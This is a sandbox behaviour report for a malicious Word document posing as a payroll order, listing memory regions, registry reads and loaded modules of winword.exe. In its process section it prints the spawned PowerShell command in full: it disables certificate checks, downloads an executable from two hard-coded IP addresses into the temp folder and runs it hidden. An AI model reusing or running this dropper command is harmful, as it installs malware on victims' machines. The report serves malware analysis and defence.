a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34 (SHA256)
Order_Payroll_81154032.doc
Word Document
Created at 2019-02-06 16:40:00
Notifications (1/1)
The overall sleep time of all monitored processes was truncated from "20 seconds" to "10 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
267
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:29, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:03:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x948 |
| Parent PID | 0x460 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E0
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9AC
0x
9A8
0x
9A4
0x
9A0
0x
99C
0x
998
0x
994
0x
990
0x
98C
0x
988
0x
984
0x
964
0x
960
0x
95C
0x
958
0x
954
0x
94C
0x
A18
0x
AC0
0x
AC4
0x
B44
0x
8F8
0x
AFC
0x
174
0x
7FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x00320fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00331fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00351fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00362fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00371fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00392fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01c20000 | 0x01eeefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ef0000 | 0x01ef0000 | 0x022e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x024affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000024b0000 | 0x024b0000 | 0x0258efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x025c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x027e0000 | 0x0289ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x0299ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a40000 | 0x02a40000 | 0x02a40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002a50000 | 0x02a50000 | 0x02a54fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a60000 | 0x02a60000 | 0x02a60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a70000 | 0x02a70000 | 0x02a71fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02a80000 | 0x02a8bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02a90000 | 0x02a97fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02aa0000 | 0x02aaffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002ab0000 | 0x02ab0000 | 0x02ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ac0000 | 0x02ac0000 | 0x02ac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ad0000 | 0x02ad0000 | 0x02ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02ae0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02af0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002b00000 | 0x02b00000 | 0x02b01fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02b1ffff | Private Memory | rw |
|
|
|
- |
| msxml6r.dll | 0x02b20000 | 0x02b20fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002b30000 | 0x02b30000 | 0x02b30fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x02c40000 | 0x02c5ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x02c61fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002c70000 | 0x02c70000 | 0x02c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02c91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02ca0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02ccffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x02cd0000 | 0x02ce0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002e10000 | 0x02e10000 | 0x02e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fa0000 | 0x02fa0000 | 0x0309ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030e0000 | 0x030e0000 | 0x0315ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003180000 | 0x03180000 | 0x0327ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003280000 | 0x03280000 | 0x032fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x033cffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000033e0000 | 0x033e0000 | 0x033effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003400000 | 0x03400000 | 0x034fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003500000 | 0x03500000 | 0x038fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003970000 | 0x03970000 | 0x03a6ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x03a70000 | 0x03aeefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003b20000 | 0x03b20000 | 0x03c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c20000 | 0x03c20000 | 0x0401ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x04020000 | 0x040cafff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004100000 | 0x04100000 | 0x041fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004260000 | 0x04260000 | 0x0435ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004360000 | 0x04360000 | 0x0445ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x0461ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004620000 | 0x04620000 | 0x0471ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004720000 | 0x04720000 | 0x04f1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f20000 | 0x04f20000 | 0x05262fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000052f0000 | 0x052f0000 | 0x053effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053f0000 | 0x053f0000 | 0x054effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005540000 | 0x05540000 | 0x0554ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055d0000 | 0x055d0000 | 0x056cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000056d0000 | 0x056d0000 | 0x057cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005870000 | 0x05870000 | 0x0587ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005890000 | 0x05890000 | 0x0598ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005a20000 | 0x05a20000 | 0x05b1ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05b20000 | 0x0644ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000064c0000 | 0x064c0000 | 0x065bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006630000 | 0x06630000 | 0x0672ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000067a0000 | 0x067a0000 | 0x0689ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068b0000 | 0x068b0000 | 0x069affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006a60000 | 0x06a60000 | 0x06b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006b60000 | 0x06b60000 | 0x07b5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000007b60000 | 0x07b60000 | 0x0835ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008470000 | 0x08470000 | 0x084effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008680000 | 0x08680000 | 0x086fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008700000 | 0x08700000 | 0x08afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008b00000 | 0x08b00000 | 0x08f00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008f10000 | 0x08f10000 | 0x09310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009320000 | 0x09320000 | 0x09720fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009730000 | 0x09730000 | 0x0992ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009930000 | 0x09930000 | 0x0a930fff | Private Memory | rw |
|
|
|
- |
| private_0x000000000a940000 | 0x0a940000 | 0x0ad3ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000374f0000 | 0x374f0000 | 0x374fffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037620000 | 0x37620000 | 0x3762ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x75010000 | 0x75042fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x777b0000 | 0x777b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13ffb0000 | 0x14018bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febd6d0000 | 0x7febd6d0000 | 0x7febd6dffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febefc0000 | 0x7febefc0000 | 0x7febefcffff | Private Memory | rwx |
|
|
|
- |
| ivy.dll | 0x7fee4580000 | 0x7fee47d4fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee47e0000 | 0x7fee55b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee55c0000 | 0x7fee5733fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5740000 | 0x7fee5859fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5860000 | 0x7fee5afafff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5c30000 | 0x7fee5cc8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee5cd0000 | 0x7fee5d3efff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee5d40000 | 0x7fee5ebdfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee5ec0000 | 0x7fee608ffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee6090000 | 0x7fee622cfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fee6230000 | 0x7fee62effff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee62f0000 | 0x7feea6d6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea6e0000 | 0x7feeb3d4fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb3e0000 | 0x7feeb81cfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7feeb820000 | 0x7feeb901fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feeb910000 | 0x7feed33bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed340000 | 0x7feedfe6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7feedff0000 | 0x7feee07afff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feee080000 | 0x7feeeb4efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feeeb50000 | 0x7feef233fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef240000 | 0x7feef6e2fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7feef6f0000 | 0x7feef78bfff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef790000 | 0x7fef0714fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef0720000 | 0x7fef07e5fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef07f0000 | 0x7fef2fc8fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 254 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WScript.Shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Registry (50)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 253, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 173 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell.exe "<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\fulezad.exe') -windowstyle hidden;" | - |
|
1 |
Module (161)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc030000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee34b0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef89d0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feff380000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee3c90000 |
|
12 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13ffb0000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fef9a00000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x774e0000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feff380000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef9a83b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef9a7a13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef9a81618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef9a7f088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee35b72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee35260b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee34d1a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3525f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee34cf000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee34be860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee34b3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee34c2380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee34b7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee34b7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee34b8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee35f3260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee35f3280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee34c1f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee3526370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee3514590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee34b55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee34c0240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee34b3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee34b6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee34b3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee34be6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee34bdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee34b7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee34bfcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee34b8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee35b2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee34c42c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee34b3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee34bab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee34ba7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee34b1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee34be830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee34b13d0 |
|
1 | |
